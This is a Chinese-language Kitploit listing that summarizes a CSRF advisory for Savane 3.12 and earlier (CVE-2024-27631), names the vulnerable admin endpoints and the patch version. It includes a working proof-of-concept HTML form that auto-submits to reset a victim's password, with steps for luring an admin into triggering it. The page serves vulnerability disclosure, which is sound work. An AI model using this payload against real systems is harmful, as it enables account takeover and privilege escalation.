Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-27631 — CVE-2024–27631 参考 | Kitploit
工具/GitHubGitHub/ally-petitt/cve-2024-27631
权限提升漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubally-petitt/cve-2024-27631

CVE-2024-27631

CVE-2024–27631 参考

查看仓库
2年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-27631 漏洞详情

概述

在Savane v3.12及之前版本中,管理功能缺乏CSRF保护可能导致权限提升和/或帐户接管。特别是,端点/siteadmin/usergroup.php包含更改其他用户密码和管理标志的功能,实际上允许攻击者使自己成为管理员。

其他易受CSRF攻击的端点包括:

  • /support/admin/userperms.php - 更改谁可以发布跟踪器的权限。
  • /project/admin/conf-copy.php - 用另一组的配置覆盖现有组的配置。
  • /project/admin/editgroupnotifications.php - 编辑组通知。私有项目可能会发送到公共邮件列表。
  • /project/admin/useradmin.php - 从组中删除用户。
  • /news/admin/index.php - 编辑新闻跟踪器电子邮件地址。
  • /people/editjob.php - 为组添加工作。

CWE分类: CWE-352: 跨站请求伪造 (CSRF)

报告者: Ally Petitt

受影响产品: Savane

受影响版本: 3.12及之前版本

验证步骤

这是一个用于更改其他用户帐户密码作为帐户接管途径的概念验证(PoC)。

  1. 选择一个要更改密码的受害者用户。
  2. 从他们的个人资料页面(/users/<username>)记下他们的用户ID。
  3. 创建以下恶意网页,将user_id替换为受害者的用户ID,将<savane_instance>替换为正确的域名/主机地址。
root@kitploit:~
<form id="autosubmit" action="http://<savane_instance>/siteadmin/user_changepw.php" method="POST">

    <input name="form_pw" type="hidden" value="Password1!" />
    <input name="form_pw2" type="hidden" value="Password1!" />
    <input name="user_id" type="hidden" value="<user_id>" />
    <input name="update" type="hidden" value="Update" />
    <input type="submit" value="Submit Request" />
</form>

<script>
document.getElementById("autosubmit").submit();
</script>

  1. 将恶意HTML页面托管在Web服务器上,并将链接发送给管理员(他们必须处于超级用户模式才能生效)。
  2. 点击链接后,使用非常安全的密码Password1!登录受害者帐户。

注意,此PoC脚本已在Firefox v103.0(64位)上测试。

缓解措施

升级到Savane 3.13或更高版本。补丁可以在这里找到。

下载工具